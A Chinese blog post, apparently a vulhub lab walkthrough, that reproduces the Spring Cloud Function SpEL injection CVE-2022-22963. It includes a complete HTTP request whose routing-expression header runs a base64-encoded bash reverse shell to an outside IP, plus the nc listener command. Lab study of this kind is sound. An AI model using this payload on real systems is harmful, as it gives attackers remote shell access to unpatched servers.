当前位置: 首页 > article >正文

vulhub spring 远程命令执行漏洞(CVE-2022-22963)

1.执行以下命令启动靶场环境并在浏览器访问

cd spring/CVE-2022-22963
docker-compose up -d
docker ps

2.反弹shell

构造payload

3.页面刷新抓包,修改内容

POST /functionRouter HTTP/1.1
Host: 172.16.1.89:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMTMuMjMxLjAvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}")
Content-Type: text/plain
Content-Length: 8

test

4.开启监听,执行反弹

nc -lvvp 7777

5.放包,成功反弹,命令执行成功


http://www.kler.cn/a/297176.html

相关文章:

  • 【网络安全】分析JS文件实现账户接管
  • 数据结构:哈希表
  • java后端保存的本地图片通过ip+端口直接访问
  • LG AI研究开源EXAONE 3.0:一个7.8B双语语言模型,擅长英语和韩语,在实际应用和复杂推理中表现出色
  • vim常用快捷键
  • 数据库的操作:数据完整性约束是什么?
  • linux-基础知识3
  • Arduino IDE的安装
  • springcloud间通信的方式
  • 非标金属零件加工的质量与效率是如何体现的?
  • Figma如何给设计的UI套样机
  • RK3562 NPU供电要求
  • wordpress做后台的资讯类小程序源码
  • Anaconda Prompt 安装paddle2.6报错
  • 线程池实现服务端
  • Linux Runtime PM(运行时电源管理)框架API
  • 97.游戏的启动与多开-共享内存多开检测
  • 九,自定义转换器详细操作(附+详细源码解析)
  • c语言--力扣简单题目(移除链表元素)讲解
  • UE4_后期处理_后期处理材质及后期处理体积一